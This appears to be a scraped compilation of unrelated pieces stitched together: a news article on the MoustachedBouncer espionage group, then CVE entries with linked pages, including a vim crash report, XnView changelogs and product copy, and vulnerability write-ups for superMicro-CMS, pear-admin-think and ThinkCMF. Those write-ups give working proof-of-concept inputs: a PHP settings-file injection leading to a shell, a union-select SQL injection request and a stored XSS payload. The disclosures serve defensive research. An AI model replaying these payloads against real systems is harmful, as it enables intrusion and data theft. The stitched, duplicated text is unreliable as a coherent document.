A hitherto undocumented threat actor operating for nearly a decade and codenamed MoustachedBouncer has been attributed to cyber espionage attacks aimed at foreign embassies in Belarus.
"Since 2020, MoustachedBouncer has most likely been able to perform adversary-in-the-middle (AitM) attacks at the ISP level, within Belarus, in order to compromise its targets," ESET security researcher Matthieu

A hitherto undocumented threat actor operating for nearly a decade and codenamed **MoustachedBouncer** has been attributed to cyber espionage attacks aimed at foreign embassies in Belarus.

"Since 2020, MoustachedBouncer has most likely been able to perform adversary-in-the-middle (AitM) attacks at the ISP level, within Belarus, in order to compromise its targets," ESET security researcher Matthieu Faou said, describing the group as skilled and advanced.

The adversary, active since at least 2014, is assessed to be aligned with Belarusian interests, likely employing a lawful interception system such as SORM to conduct its AitM attacks as well as deploy disparate tools called NightClub and Disco.

Both the Windows malware frameworks support additional spying plugins including a screenshotter, an audio recorder, and a file stealer. The oldest sample of NightClub dates back to November 19, 2014, when it was uploaded to VirusTotal from Ukraine.

Embassy staff from four different countries have been targeted since June 2017: two from Europe, one from South Asia, and one from Northeast Africa. One of the European diplomats was compromised twice in November 2020 and July 2022. The names of the countries were not revealed.

MoustachedBouncer is also believed to work closely with another advanced persistent threat (APT) actor known as Winter Vivern (aka TA473 or UAC-0114), which has a track record of striking government officials in Europe and the U.S.

The exact initial infection vector used to deliver NightClub is presently unknown. The distribution of Disco, on the other hand, is accomplished by means of an AitM attack.

"To compromise their targets, MoustachedBouncer operators tamper with their victims' internet access, probably at the ISP level, to make Windows believe it's behind a captive portal," Faou said. "For IP ranges targeted by MoustachedBouncer, the network traffic is tampered at the ISP level, and the latter URL redirects to a seemingly legitimate, but fake, Windows Update URL."

"While the compromise of routers in order to conduct AitM on embassy networks cannot be fully discarded, the presence of lawful interception capabilities in Belarus suggests the traffic mangling is happening at the ISP level rather than on the targets' routers," Fou said.

Two Belarusian internet service providers (ISPs), viz Unitary Enterprise A1 and Beltelecom, are suspected to be involved in the campaign, per the Slovak cybersecurity company.

Victims who land on the bogus page are greeted with a message urging them to install critical security updates by clicking on a button. In doing so, a rogue Go-based "Windows Update" installer is downloaded to the machine that, when executed, sets up a scheduled task to run another downloader binary responsible for fetching additional plugins.

The add-ons expand on Disco's functionality by capturing screenshots every 15 seconds, executing PowerShell scripts, and setting up a reverse proxy.

A significant aspect of the plugins is the use of the Server Message Block (SMB) protocol for data exfiltration to command-and-control servers that are inaccessible over the internet, making the threat actor's infrastructure highly resilient.

Also used in the January 2020 attack aimed at diplomats of a Northeast African country in Belarus is a C# dropper referred to as SharpDisco, which facilitates the deployment of two plugins by means of a reverse shell in order to enumerate connected drives and exfiltrate files.

The NightClub framework also comprises a dropper that, in turn, launches an orchestrator component to harvest files of interest and transmit them over the Simple Mail Transfer Protocol (SMTP) protocol. Newer variants of NightClub found in 2017 and 2020 also incorporate a keylogger, audio recorder, screenshotter, and a DNS-tunneling backdoor.

"The DNS-tunneling backdoor (ParametersParserer.dll) uses a custom protocol to send and receive data from a malicious DNS server," Faou explained. "The plugin adds the data to exfiltrate as part of the subdomain name of the domain that is used in the DNS request."

The commands supported by the modular implant allow the threat actor to search for files matching a specific pattern, read, copy, and remove files, write to files, copy directories, and create arbitrary processes.

It's believed that NightClub is used in scenarios where traffic interception at the ISP level isn't possible because of anonymity-boosting mitigations such as the use of an end-to-end encrypted VPN where internet traffic is routed outside of Belarus.

"The main takeaway is that organizations in foreign countries where the internet cannot be trusted should use an end-to-end encrypted VPN tunnel to a trusted location for all their internet traffic in order to circumvent any network inspection devices," Faou said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Researchers Uncover Decade-Long Cyber Espionage on Foreign Embassies in Belarus

vim 8.2.2348 is affected by null pointer dereference, allows local attackers to cause a denial of service (DoS) via the ex_buffer_all method.

**To Reproduce**

vim -u NONE -X -Z -e -s -S poc -c :qa!

**Debug Info**

Program received signal SIGSEGV, Segmentation fault.
\[----------------------------------registers-----------------------------------\]
RAX: 0x935c60 --\> 0x3f3
RBX: 0x1
RCX: 0x0
RDX: 0x3000 ('')
RSI: 0x62 ('b')
RDI: 0x0
RBP: 0x921600 --\> 0x3f7
RSP: 0x7fffffff81e0 --\> 0x7c ('|')
RIP: 0x412ec8 (<ex\_buffer\_all+168>:     cmp    DWORD PTR \[rcx+0x78\],0x1)
R8 : 0x0
R9 : 0x1
R10: 0x7ffff741d080 (<\_\_strncmp\_sse42+1328>:    pslldq xmm2,0xb)
R11: 0x0
R12: 0x501
R13: 0x8f1ed0 --\> 0x6c62006162 ('ba')
R14: 0x0
R15: 0x90cbd0 --\> 0x3e9
EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
\[-------------------------------------code-------------------------------------\]
   0x412ebd <ex\_buffer\_all+157>:        nop    DWORD PTR \[rax\]
   0x412ec0 <ex\_buffer\_all+160>:        mov    rcx,QWORD PTR \[rbp+0x8\]
   0x412ec4 <ex\_buffer\_all+164>:        mov    r15,QWORD PTR \[rbp+0x18\]
=\> 0x412ec8 <ex\_buffer\_all+168>:        cmp    DWORD PTR \[rcx+0x78\],0x1
   0x412ecc <ex\_buffer\_all+172>:        jg     0x412f40 <ex\_buffer\_all+288>
   0x412ece <ex\_buffer\_all+174>:        test   BYTE PTR \[rip+0x4d5cf7\],0x2        # 0x8e8bcc <cmdmod+4>
   0x412ed5 <ex\_buffer\_all+181>:        jne    0x412ef0 <ex\_buffer\_all+208>
   0x412ed7 <ex\_buffer\_all+183>:        movsxd rcx,DWORD PTR \[rbp+0xc8\]
\[------------------------------------stack-------------------------------------\]
0000| 0x7fffffff81e0 --\> 0x7c ('|')
0008| 0x7fffffff81e8 --\> 0x270f
0016| 0x7fffffff81f0 --\> 0x7f0100000000
0024| 0x7fffffff81f8 --\> 0x4d6709 (<del\_trailing\_spaces+9>:     add    rax,rbx)
0032| 0x7fffffff8200 --\> 0x8f1ed2 --\> 0xbb980000006c6200
0040| 0x7fffffff8208 --\> 0x0
0048| 0x7fffffff8210 --\> 0x501
0056| 0x7fffffff8218 --\> 0x8f1ed0 --\> 0x6c62006162 ('ba')
\[------------------------------------------------------------------------------\]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
ex\_buffer\_all (eap=<optimized out\>) at buffer.c:5161
5161                if ((wp\->w\_buffer\->b\_nwindows \> 1
gdb-peda$ 

stacktrace :

#0  ex\_buffer\_all (eap=<optimized out>) at buffer.c:5161
#1  0x00000000004684ba in do\_one\_cmd (cmdlinep=0x7fffffff8258, flags=0x7, cstack=0x7fffffff8438, fgetline=0x409430 <getnextac>, cookie=0x7fffffff8bf0) at ex\_docmd.c:2588
#2  do\_cmdline (cmdline=<optimized out>, cmdline@entry=0x0, fgetline=<optimized out>, cookie=<optimized out>, cookie@entry=0x7fffffff8bf0, flags=flags@entry=0x7) at ex\_docmd.c:1003
#3  0x00000000004089d5 in apply\_autocmds\_group (event=event@entry=EVENT\_BUFUNLOAD, fname=0x8f1e90 "/mnt/disk/out/vim\_bak/vim-fuzzer-out/\\261'\\377\\177", fname\_io=<optimized out>, force=<optimized out>,
    force@entry=0x0, group=group@entry=0xfffffffd, buf=buf@entry=0x92f650, eap=0x0) at autocmd.c:2109
#4  0x0000000000409287 in apply\_autocmds (event=EVENT\_BUFADD, event@entry=EVENT\_BUFUNLOAD, fname=0x62 <error: Cannot access memory at address 0x62>,
    fname\_io=0x3000 <error: Cannot access memory at address 0x3000>, force=force@entry=0x0, buf=0x1, buf@entry=0x92f650) at autocmd.c:1621
#5  0x000000000040ba68 in buf\_freeall (buf=0x92f650, flags=flags@entry=0x4) at buffer.c:803
#6  0x00000000004612b8 in do\_ecmd (fnum=<optimized out>, fnum@entry=0x0, ffname=<optimized out>, ffname@entry=0x8f1591 "", sfname=<optimized out>, sfname@entry=0x0, eap=<optimized out>,
    eap@entry=0x7fffffffaf50, newlnum=newlnum@entry=0x1, flags=<optimized out\>, oldwin=<optimized out\>) at ex\_cmds.c:2897
#7  0x000000000046d8ab in do\_exedit (eap=eap@entry=0x7fffffffaf50, old\_curwin=old\_curwin@entry=0x0) at ex\_docmd.c:6691
#8  0x000000000046fff7 in ex\_open (eap=0x7fffffffaf50) at ex\_docmd.c:6581
#9  0x00000000004684ba in do\_one\_cmd (cmdlinep=0x7fffffffaf28, flags=0x7, cstack=0x7fffffffb108, fgetline=0x5668a0 <getsourceline>, cookie=0x7fffffffb8a0) at ex\_docmd.c:2588
#10 do\_cmdline (cmdline=<optimized out>, cmdline@entry=0x903de0 "\\223?", fgetline=<optimized out>, cookie=<optimized out>, cookie@entry=0x7fffffffb8a0, flags=flags@entry=0x7) at ex\_docmd.c:1003
#11 0x0000000000566685 in do\_source (fname=<optimized out>, fname@entry=0x8f7e93 "tEBgHp/crashes/id:000002,sig:11,src:016627+022923,op:splice,rep:2", check\_other=<optimized out>, check\_other@entry=0x0,
    is\_vimrc=is\_vimrc@entry=0x0, ret\_sid=<optimized out\>, ret\_sid@entry=0x0) at scriptfile.c:1401
#12 0x0000000000565df9 in cmd\_source (fname=0x8f7e93 "tEBgHp/crashes/id:000002,sig:11,src:016627+022923,op:splice,rep:2", eap=<optimized out>) at scriptfile.c:971
#13 0x00000000004684ba in do\_one\_cmd (cmdlinep=0x7fffffffb998, flags=0xb, cstack=0x7fffffffbb78, fgetline=0x0, cookie=0x0) at ex\_docmd.c:2588
#14 do\_cmdline (cmdline=<optimized out>, fgetline=<optimized out>, fgetline@entry=0x0, cookie=<optimized out>, cookie@entry=0x0, flags=flags@entry=0xb) at ex\_docmd.c:1003
#15 0x0000000000468e1e in do\_cmdline\_cmd (cmd=0x0) at ex\_docmd.c:592
#16 0x0000000000627a6d in exe\_commands (parmp=<optimized out>) at main.c:3056
#17 vim\_main2 () at main.c:760
#18 0x0000000000626bd2 in main (argc=<optimized out>, argc@entry=0xb, argv=<optimized out>, argv@entry=0x7fffffffe4b8) at main.c:412
#19 0x00007ffff72f7840 in \_\_libc\_start\_main (main=0x6253a0 <main>, argc=0xb, argv=0x7fffffffe4b8, init=<optimized out>, fini=<optimized out>, rtld\_fini=<optimized out>, stack\_end=0x7fffffffe4a8)
    at ../csu/libc-start.c:291
#20 0x0000000000404269 in \_start ()

**Environment (please complete the following information):**

*   Vim version : commit 9567efa
*   OS: Ubuntu 16.04

**Additional context**

compile argument：

#!/bin/bash -eux
export CC="clang-11"
export CXX="clang-11++"
cd /src/vim/ && ./configure --with-features=huge --enable-gui=none && make

poc:  
poc.gz

Credit: 1vanChen of NSFOCUS Security Team

CVE-2021-3236: Lack of verification of wp->w_buffer causes null pointer references in ex_buffer_all() · Issue #7674 · vim/vim

An issue was discovered in pcmt superMicro-CMS version 3.11, allows authenticated attackers to execute arbitrary code via the font_type parameter to setup.php.

**Vulnerability conditions: log in to the management background**

Vulnerability file：superMicro-CMS-main\\admin\\setup.php

\`  
// Write/overwrite settings file  
$settings = '../inc/settings.php'; //settings file  
$settings\_text = "<?php //settings\_text,Many parameters are user-controllable

if(!defined('ACCESS')) {  
die('Direct access not permitted to settings.php.');  
}

define('LOCATION', '{$site\_location}');  
define('ADMIN', '{$admin}');  
define('APACHE', {$apache});  
define('WINDOWS', {$windows});  
define('OPSYS', '{$opSystem}');  
define('HOME\_LINK', '{$home\_link}');  
define('NAME', '{$name}');  
define('ALPHABETICAL', {$alphabetical});  
define('SHOW\_ERRORS', {$show\_errors});  
define('TRACK\_HITS', {$track\_hits});  
define('PHP\_EXT', {$php\_ext});  
define('EMAIL', '{$email}');  
define('SITE\_NAME', '{$site\_name}');  
define('OWN\_NAME', '{$own\_name}');  
define('CONTACT\_TEXT', '{$contact\_text}');  
define('CONTACT\_MENU', '{$contact\_menu}');  
define('FONT\_TYPE', '{$font\_type}'); // This parameter is not filtered, I just start from here  
define('LANG\_ATTR', '{$lang\_attr}'); // This parameter also not filtered  
define('VERSION', '{$version}');

?>";  
$fp2 = @fopen($settings, 'w+'); //open settings.php  
fwrite($fp2, $settings\_text); // save content to settings.php\`

$font_type = $_POST['font_type']; // This value is not visible on the page and can be submitted with burpsuite

Vulnerability POC：

1.  log in to the management background
2.  Click setup-->Submit setup

3\. BurpSuite modify “font\_type” value

4\. Access this shell

CVE-2021-25857: Admin setup option getshell · Issue #2 · pcmt/superMicro-CMS

Cross Site Scripting (XSS) vulnerability in Name Input Field in Contact Us form in Laborator Kalium before 3.0.4, allows remote attackers to execute arbitrary code.

CVE-2020-24075: Kalium Changelog - Laborator

Buffer Overflow vulnerability in XNView version 2.49.3, allows local attackers to execute arbitrary code via crafted TIFF file.

Dear user,

XnView 2.49.4 for Windows is available. Versions are available on the normal XnView Download page.

Please note that the XnView Download page offers packages with German/French Setup and German/French Online help.

Direct links to the English Standard version are:  
http://download.xnview.com/XnView-win.exe (English Setup, Multi language)  
http://download.xnview.com/XnView-win.zip (ZIP file, Multi language)

XnView Shell Extension 32bits:  
http://download.xnview.com/XnShellEx.exe  
http://download.xnview.com/XnShellEx.zip

XnView Shell Extension 64bits:  
http://download.xnview.com/XnShellEx64.exe  
http://download.xnview.com/XnShellEx64.zip

SHA256:  
XnView-win.exe: 030E3E45C51A349A3417B52AD6F6547267F1AA6E86BF03BB13E49341AB9FAEB8  
XnView-win.zip: 9E936FB7CD699019A2D1ADF795D6BB078A08686D95ACA0BEA482E0ECE5C72902  
XnView-win-full.exe: 31E13FE27894610D27167ABB0503C6B109E00169D6F3E291BE6661D27953E1C6  
XnView-win-full.zip: 646DE249CEB6E9C1736BC34217C36E720FD7E2FA25468B271A6DEC18707D4E3E  
XnView-win-small.exe: 57E5DF33083C3F440CFA7E44ABE4403724679EEC7A1E57018A5B81A1748557FB  
XnView-win-small.zip: 15DC199567011B41B616BB38DFF31771A9D3E65F1517FC2BEE2068DD69B479FE

\_\_\_\_ 2.49.4 Changelog

\* Ghostscript 9.53.x  
\* GPS & file date - viewtopic.php?f=56&t=40971  
\* TIFF Security vulnerability (Thanks to Michael Heinzl)  
\* NConvert: -levels2 - viewtopic.php?f=57&t=40490  
\* NConvert: -resize supports cm/mm/inches  
\* NConvert: -autodeskew fixed  
\* NConvert: -noholder to disable %$ chars - viewtopic.php?f=57&t=40820

\_\_\_\_ 2.49.3 Changelog

\* Convert 16 to 256 colors - viewtopic.php?f=36&t=39421  
\* Disable ESC to close tabs - viewtopic.php?f=35&t=17078  
\[General\] EscToCloseView=0  
\* Select file from search results & switching mode - viewtopic.php?f=34&t=40063  
\* Title empty when recurse - viewtopic.php?f=36&t=39979  
\* Resize - viewtopic.php?f=35&t=40248  
\* Slideshow: Order of files - viewtopic.php?f=56&t=40087  
\* Fortis Mag fix  
\* NConvert: -wmsize watermark percent size - viewtopic.php?f=57&t=38754  
\* NConvert: canvas size in inches/cm/mm - viewtopic.php?f=57&t=39361  
\* NConvert: replace\_color - viewtopic.php?f=57&t=39769  
\* NConvert: -temperature added

\_\_\_\_ 2.49.2 Changelog

\* Problem with Ghostscript 9.50  
\* PDF font problem - viewtopic.php?f=36&t=39662  
\* CR3 - viewtopic.php?f=35&t=39478  
\* .sld must use 'Recurse' setting - viewtopic.php?f=35&t=39330  
\* GIF loop - viewtopic.php?f=36&t=31689  
\* PAM CMYK

\_\_\_\_ 2.49.1 Changelog

\* TIFF 16bits greyscale

\_\_\_\_ 2.49 Changelog

\* SQLite 3.29.0  
\* NConvert: greater\_than/less\_than condition - viewtopic.php?f=57&t=39147  
\* PSD: Error when writing metadata - viewtopic.php?f=57&t=39137  
\* Export - Problem with RGBA - viewtopic.php?f=36&t=39044  
\* Capture - viewtopic.php?f=36&t=38934  
\* Left/Right F11 to open fullscreen on Left/Right monitor  
\* Create multi file & folder with '.' - viewtopic.php?f=36&t=39008  
\* # to comment line in .sld file  
\* Multipage create: Check if output filename exists  
\* Slideshow crash when using animated GIF - viewtopic.php?f=36&t=38902  
\* XIM format import added  
\* Change timestamp must not use 12h format - viewtopic.php?f=36&t=38702  
\* GIF not played correctly in Slideshow - viewtopic.php?f=34&t=38303  
\* CVE - https://github.com/apriorit/pentesting/ ... ugs/xnview  
\* NConvert: -unsharp  
\* NConvert: -exposure - viewtopic.php?f=57&t=39136  
\* NConvert: -colorize h l s  
\* NConvert: Remove EXIF orientation -exif\_rotation - viewtopic.php?f=57&t=38648  
\* \[Rename\]/TemplateStart, position of number in template - viewtopic.php?f=34&t=38568  
\* CVE-2019-12151  
\* ShellEx: 'Convert...' & input fields

\_\_\_\_ 2.48 Changelog

\* RGB inverted when printing 8bits cmap picture from browser  
\* WebP 32bits  
\* PDF Multipage create - viewtopic.php?f=35&t=38030

\_\_\_\_ 2.47 Changelog

XCF 2.10  
ICNS with JPEG2000 icon  
GIF loop & Quick slideshow - viewtopic.php?f=36&t=31689  
Problem with local charset for image description EXIF field  
\[Start\]/BugBlueLine=1 to remove the bug of blue line  
PDF output without font info - viewtopic.php?f=35&t=38030  
Space must not show tagbox if not enabled  
NConvert: -no\_auto\_rotate - viewtopic.php?f=57&t=38239  
NConvert: -autocrop with position  
NConvert: add -lower to lower case output filename  
NConvert: Bug when output filename contains a numeric enumerator - viewtopic.php?f=57&t=38014

\_\_\_\_ 2.46 Changelog

JPEG2000 YCC - viewtopic.php?f=35&t=37806  
Bad loading for ARW - viewtopic.php?f=36&t=37683  
TIFF with JPEG compression - viewtopic.php?f=35&t=37585  
Adjust dialog clipped - viewtopic.php?f=36&t=32011  
PDF version 1.4 output  
Sqlite 2.24.0  
RLE & ICO vulnerabilities Cody Sixteen from STM Solutions  
NConvert: stdout problem on windows - viewtopic.php?f=57&t=37810

\_\_\_\_ 2.45 Changelog

License written in HKCU  
Support HPI with transparency  
Shows dots under certain conditions - viewtopic.php?f=36&t=37447  
Resize - viewtopic.php?f=36&t=37451  
Blue bar - viewtopic.php?f=36&t=36278  
Resize dialog crash with ^^ - viewtopic.php?f=36&t=36644  
Parameters & External program - viewtopic.php?f=35&t=15465

\_\_\_\_ 2.44 Changelog

Monitor power off during slideshow  
Color profile not used Browser>Print - viewtopic.php?f=36&t=36833  
\-filelist doesn't work anymore  
Tile child window - viewtopic.php?f=56&t=36527  
Strange colors on grey image - viewtopic.php?f=35&t=36485  
UTF8 Exif Image Description

\_\_\_\_ 2.43 Changelog

Better HEIF support - http://www.xnview.com/download/plugins/heif\_x32.zip  
Unwanted file types shown in Viewer - viewtopic.php?f=36&t=35484  
FileListUseExt=1  
Alpha glitch - viewtopic.php?f=36&t=36454  
Folder browsing via command line - viewtopic.php?f=36&t=36434  
Lossless crop corruption - viewtopic.php?f=36&t=36378

\_\_\_\_ 2.42 Changelog

HEIF support - Extract http://www.xnview.com/download/plugins/heif\_x32.zip in Plugins folder

\_\_\_\_ 2.41 Changelog

Basic support for unicode filename  
2Gb limitation on 64bits OS - http://newsgroup.xnview.com/viewtopic.php?f=36&t=35165  
Displaying RGBA image without use alpha - http://newsgroup.xnview.com/viewtopic.php?f=36&t=35809  
Print TIFF with orientation flag in browser - http://newsgroup.xnview.com/viewtopic.php?f=36&t=36197  
GIF loop not saved in .sld - http://newsgroup.xnview.com/viewtopic.php?f=35&t=35991  
Clip support - http://newsgroup.xnview.com/viewtopic.php?f=34&t=28554  
Slideshow crash on RAW files - http://newsgroup.xnview.com/viewtopic.php?f=36&t=34632  
TIF > 2GB & multipage - http://newsgroup.xnview.com/viewtopic.php?f=79&t=35056  
RGBA printing  
Thumbnails upscaling - http://newsgroup.xnview.com/viewtopic.php?f=35&t=36090  
NConvert: -keepdocsize fixed  
NConvert: -shadow - http://newsgroup.xnview.com/viewtopic.php?f=57&t=36163  
NConvert: -align - http://newsgroup.xnview.com/viewtopic.php?f=57&t=36164

\_\_\_\_ 2.40 Changelog

CMYK image default color profile - http://newsgroup.xnview.com/viewtopic.php?f=35&t=31685  
http://newsgroup.xnview.com/viewtopic.php?f=35&t=28839  
RGBA resize (bilinear) - http://newsgroup.xnview.com/viewtopic.php?f=36&t=33425  
http://newsgroup.xnview.com/viewtopic.php?t=29238  
http://newsgroup.xnview.com/viewtopic.php?t=34493  
Ctrl+RMB to copy color - http://newsgroup.xnview.com/viewtopic.php?p=141793  
Capture rectangle on second monitor - http://newsgroup.xnview.com/viewtopic.php?f=56&t=32892  
Print 50+ via command line - http://newsgroup.xnview.com/viewtopic.php?f=35&t=35350  
Filelist to print - http://newsgroup.xnview.com/viewtopic.php?f=34&t=35378  
LIBPNG 1.6.29  
SQLite 3.18.0  
ZLIB 1.2.11  
LCMS 2.8  
BMP 2+10+10+10 - http://newsgroup.xnview.com/viewtopic.php?f=36&t=32577  
Category removed if delete file - http://newsgroup.xnview.com/viewtopic.p ... 2&start=15  
Category moved with Cut/Paste  
8BF & undo - http://newsgroup.xnview.com/viewtopic.php?f=36&t=34508  
'Purge Now' - http://newsgroup.xnview.com/viewtopic.php?f=34&t=32667  
OpenEXR updated - http://newsgroup.xnview.com/viewtopic.php?f=36&t=33039  
Resize gamma correction - http://newsgroup.xnview.com/viewtopic.php?f=34&t=33273  
Change timestamp & DST - http://newsgroup.xnview.com/viewtopic.php?f=36&t=33483  
Selection + Tab - http://newsgroup.xnview.com/viewtopic.php?f=36&t=33983  
GIF loop - http://newsgroup.xnview.com/viewtopic.php?f=35&t=34036  
PAM format - http://newsgroup.xnview.com/viewtopic.php?f=36&t=35132  
JPEG 2000 - http://newsgroup.xnview.com/viewtopic.php?f=36&t=35277  
Maximize on first monitor - http://newsgroup.xnview.com/viewtopic.php?f=36&t=32343  
Resize default size - http://newsgroup.xnview.com/viewtopic.php?f=34&t=33694  
PEF for thumbnail's folder - http://newsgroup.xnview.com/viewtopic.php?f=35&t=35363  
Cancel removed from Setup wizard - http://newsgroup.xnview.com/viewtopic.php?f=34&t=32958  
Previous/Next file & RecognizeByExt == false - http://newsgroup.xnview.com/viewtopic.php?f=36&t=33127  
Next/Previous & video - http://newsgroup.xnview.com/viewtopic.php?f=36&t=35182  
Better dialog for update - http://newsgroup.xnview.com/viewtopic.php?f=34&t=19950  
WebP plugin updated  
OpenJPEG2000 updated  
RIOT addon updated  
PNGOUT updated  
X3F with only embedded JPEG  
NConvert: text with -text\_rotation - http://newsgroup.xnview.com/viewtopic.php?f=57&t=35441  
NConvert: -text\_border added

\_\_\_\_ 2.39 Changelog

no IPTC fields in tooltip/info  
Thumbnail for blend file

\_\_\_\_ 2.38 Changelog

Sort by exif - http://newsgroup.xnview.com/viewtopic.php?f=36&t=32387  
Zooming instead file navigation - http://newsgroup.xnview.com/viewtopic.php?f=36&t=33917

\_\_\_\_ 2.37 Changelog

Better HiDPI support  
Change timestamp and video  
GPS direction - http://newsgroup.xnview.com/viewtopic.php?f=35&t=33587  
Right click (make selection) and delete - http://newsgroup.xnview.com/viewtopic.php?f=36&t=33700  
NConvert: Multipage extract - http://newsgroup.xnview.com/viewtopic.php?f=57&t=33879

\_\_\_\_ 2.36 Changelog

FLIF format added  
SVG support via rsvg-convert.exe - http://newsgroup.xnview.com/viewtopic.php?f=34&t=31748  
Search similar & extension - http://newsgroup.xnview.com/viewtopic.php?f=56&t=32840  
Multipage save doesn't use read settings  
PCT crash - http://newsgroup.xnview.com/viewtopic.php?f=36&t=33025  
NConvert: -t start step for number in output name

\_\_\_\_ 2.35 Changelog

#THUMB\_WIDTH\_MAX# & #THUMB\_HEIGHT\_MAX# - http://newsgroup.xnview.com/viewtopic.php?f=34&t=30652  
JPEGXR  
Backspace not working in fullscreen  
LibPNG 1.6.20  
ZIPPack Addon - http://newsgroup.xnview.com/viewtopic.php?f=35&t=31563

Pierre.

CVE-2021-28427: XnView 2.49.4 - XnView Software

Buffer Overflow vulnerability in XNView before 2.50, allows local attackers to execute arbitrary code via crafted GEM bitmap file.

  

XnView Classic: Best Photo Viewer, Image Resizer & Batch Converter for Windows.

XnView is compatible with Windows 7 and Windows 10.  
Version 2.51.2

  

**XnView** is an efficient image viewer, browser and converter for Windows.  
This software is really simple to use and totally free for personal use. It supports more than 500 image formats! No Adware, No Spyware. Download for Windows

Features

Photo Viewer

With XnView you can browse, organize, and view your images in numerous ways:

*   Thumbnail View
*   FullScreen View
*   FilmStrip View
*   SlideShow with FX
*   Images Compare
*   etc...

Photo Editor

XnView allows you to process your images with an arsenal of editing tools:

*   Resize, Rotate, Crop
*   Lossless Rotate & Crop (jpeg)
*   Adjust Brightness, Contrast, ...
*   Auto Levels, Auto Contrast
*   Modify Colors depth & palette
*   Apply filters & Effects

Create

In addition to **exporting** to more than 70 Formats XnView lets you create:

*   SlideShows
*   Web Pages
*   Contact Sheets
*   Video Thumbnails Gallery
*   File Listings
*   Strip of Images

Unrivaled Compatibility

XnView lets you **read** about 500 formats (including Multipage and animated still formats APNG, TIFF, GIF, ICO,etc..).  
_Some formats may require Plug-ins_

XnView also provides a convenient **Screen Capture module** and Windows ™ **TWAIN & WIA** interface to capture images.

And Much More ...

Some other notable features of XnView are:

*   Metadata support & Editing (IPTC)
*   JPEG lossless Transforms
*   Duplicate File Finder
*   Batch Processing
*   Batch Rename
*   Print Module

Downloads

Download **XnView 2.51.2** for Windows:

Donate

XnView is provided as **FREEWARE** (NO Adware, NO Spyware) for private or educational use (including non-profit organizations).  
If you enjoy using XnView, Don't hesitate to help the developer with a small donation.

You may want to check out all the Addons also available for XnView.

SHA-256 checksums:  
XnView-win.exe: A09A25EC83F277580821AFC0982041078E8992A9C778E52984CE6CC8F3C69B90  
XnView-win.zip: B463C5E2B77F981614B67E4AAB0D78385DC2EE80A6A8852EE129ED2E345BD1D4  
XnView-win-full.exe: 5089486DD86D0DE1CB55EEA4D13EB73BDC2BBCECD4831371F971DE50E4E2DA7B  
XnView-win-full.zip: 96D8A69DA9014466A22ED3677426E0134D8C41452202E8C198314559A5A1807A  
XnView-win-small.exe: 064A8D8647C1D3FD2AAC97DB1FE8A04FDAD3E80C63A1AC3591C980452E7E01E2  
XnView-win-small.zip: 1DA17B608BB0D7E5892FAD7562D8E9E36C6459118AFA30F11A412C91AC6D7916'

Screenshots

History of changes

Changelog

Support

**Visit the Forum**

The XnView forum is probably the best place to start interacting with other users and the developer.

**User Guide**

XnView Wiki is where XnView user guide is maintained.

CVE-2021-28835: The Best Windows Photo Viewer, Image Resizer and Batch Converter · XnView

SQL Injection in pear-admin-think version 2.1.2, allows attackers to execute arbitrary code and escalate privileges via crafted GET request to Crud.php.

pear-admin-think V2.1.2 has a sql injection vulnerability

sql injection vulnerability exists in pear-admin-think V2.1.2  
This vulnerability allows remote attackers to obtain user sensitive data and even command execution

url:/admin.php/admin.crud/list/name/admin\_admin?page=1&limit=10  
Vulnerability file:app/admin/controller/admin/Crud.php

        public function list($name)
        {
            $sql = Db::query('SELECT COLUMN_NAME,IS_NULLABLE,DATA_TYPE,IF(COLUMN_COMMENT = "",COLUMN_NAME,COLUMN_COMMENT) COLUMN_COMMENT FROM information_schema.COLUMNS WHERE TABLE_NAME = "' . $name . '"order by ORDINAL_POSITION asc');
            $this->jsonApi('', 0, $sql);
        }
    

Vulnerability exploitation:  
1.Log in backstage  
2.Curd:  
  

poc:

    GET /admin.php/admin.crud/list/name/123"union%20select%201,database(),3,4%23?page=1&limit=10 HTTP/1.1
    Host: www.padmin.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Connection: close
    Referer: http://www.padmin.com/admin.php/admin.crud/index
    Cookie: thinkphp_show_page_trace=0|0; _ga=GA1.2.82281587.1616725844; _gid=GA1.2.1061036003.1616725844; PHPSESSID=24b6f9927555352d4dbfbdf7c145d92a; thinkphp_show_page_trace=0|0; hash=606a3660a4af22638d896476e523344aa470e9b38ea908989711bb9abe5d92b57d31c36a923ed9bd379b16a871efca19b4d6847d9fc88b180e9f620c36a26b8a1f40fc99a846d2ac8eb60b4b4c8cc845
    X-Forwarded-For: 127.0.0.1
    X-Originating-IP: 127.0.0.1
    X-Remote-IP: 127.0.0.1
    X-Remote-Addr: 127.0.0.1

CVE-2021-29378: pear-admin-think V2.1.2 has a sql injection vulnerability · Issue #I3DIEC · Pear Admin/Pear Admin Think - Gitee.com

Cross Site Scripting (XSS) vulnerability in UserController.php in ThinkCMF version 5.1.5, allows attackers to execute arbitrary code via crafted user_login.

At vendor/thinkcmf/cmf-app/src/admin/controller/UserController.php

There is no filtering of the user's post requests.

For example:

line 138:

$result             = DB::name('user')->insertGetId($_POST);

line 221:  
$result = DB::name('user')->update($_POST);

So There is a Stored XSS vulnerability in user management,

POC:

    POST /admin/user/addpost.html HTTP/1.1
    Host: test.net
    Connection: close
    Content-Length: 115
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: https://test.net
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://test.net/admin/user/add.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
    Cookie: thinkphp_show_page_trace=0|0; admin_username=admin; PHPSESSID=ju91k4c4do16sl2qqac553edl1
    
    user_login=%3Cimg+src%3D''+onerror%3Dalert(%2Fxss%2F)%3E&user_pass=123456&user_email=1111%40qqq.com&role_id%5B%5D=2

CVE-2020-25915: There is a store Stored XSS vulnerability in user management · Issue #675 · thinkcmf/thinkcmf

